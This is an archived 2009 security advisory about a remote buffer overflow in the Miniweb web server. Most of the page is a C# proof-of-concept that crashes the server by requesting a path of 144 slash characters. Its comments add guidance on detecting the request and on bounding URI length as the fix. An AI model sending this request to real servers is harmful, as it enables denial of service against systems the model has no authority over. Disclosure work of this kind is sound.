securityvulnsSecurityvulnsSECURITYVULNS:DOC:21671
HistoryApr 16, 2009 - 12:00 a.m.

Miniweb Buffer Overflow


################### Miniweb Remote Buffer Overflow ############################

########By: e.wiZz!

########Site: www.balcansecurity.com

######## Found with ServMeNot (world's sexiest fuzzer :P )

In the wild…
#################################################################

/* Buffer overflow (BoF) occurs when the requested URI is longer than ~120 */

using System;
using System.IO;
using System.Net;
using System.Text;

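namespace idiot
{
    /// <summary>
    /// Crash reproducer for the Miniweb long-URI buffer overflow described in this
    /// advisory: it sends a single HTTP request whose path is 144 '/' characters
    /// and prints whether the server still produced a response.
    /// </summary>
    /// <remarks>
    /// The advisory states the overflow occurs for request URIs longer than ~120;
    /// the root cause inside the server is not shown on this page (presumably a
    /// fixed-size buffer that receives the request path, to be confirmed against
    /// the server source). For defenders, the request is recognisable in access
    /// logs and on the wire as a request line whose path is one long run of '/'.
    /// The server-side remedy is to bound the URI length before it is copied.
    /// </remarks>
    class pf
    {
        /// <summary>
        /// Reads the base URL from standard input, appends the over-long path and
        /// issues the request.
        /// </summary>
        /// <param name="args">Unused.</param>
        static void Main(string[] args)
        {
            Console.Write("Enter host:\n");
            string site = Console.ReadLine();

            // 144 slashes: above the ~120 threshold quoted in the advisory.
            string uri = new string('/', 144);

            try
            {
                HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(site + uri);

                // Dispose the response so the underlying connection is released.
                using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
                {
                    // Any response means the server survived the request. The header
                    // name is misspelled ("Content-Lenght"), so the comparison against
                    // "a" is expected to hold for any real response; it is kept as
                    // published.
                    if (response.GetResponseHeader("Content-Lenght") != "a")
                    {
                        Console.WriteLine("Exploit failed");
                    }
                }
            }
            catch (Exception ex)
            {
                // NOTE(review): this branch is also reached for a malformed host
                // string and for HTTP error statuses (GetResponse throws
                // WebException on those), so "Cannot connect" does not by itself
                // prove that the server crashed. Check the server process and its
                // logs to confirm.
                Console.WriteLine("Cannot connect");
                Console.WriteLine("{0}", ex.Message);
            }
        }
    }
}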